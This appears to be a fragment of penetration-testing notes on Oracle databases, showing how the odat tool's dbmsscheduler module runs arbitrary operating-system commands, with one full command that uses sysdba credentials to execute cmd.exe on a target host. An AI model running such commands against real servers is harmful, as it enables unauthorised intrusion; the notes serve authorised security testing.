Reboare/backup/os-agnostic/oracle-databases.md

 ## Code Execution

+There's unfortunately nothing as trivial as xp\_cmdshell for Oracle databases, but we do have options.
 We can use dbmsscheduler in odat to execute arbitrary commands, however the results are not displayed.
 You'll have to use one of the many file transfer methods to fetch the output of this command.

 ```
 ./odat.py dbmsscheduler -s 192.168.0.5 -d ORCL -U username -P password --sysdba --exec "C:\windows\system32\cmd.exe /c dir C:\\Users\\ > C:\output" -vvv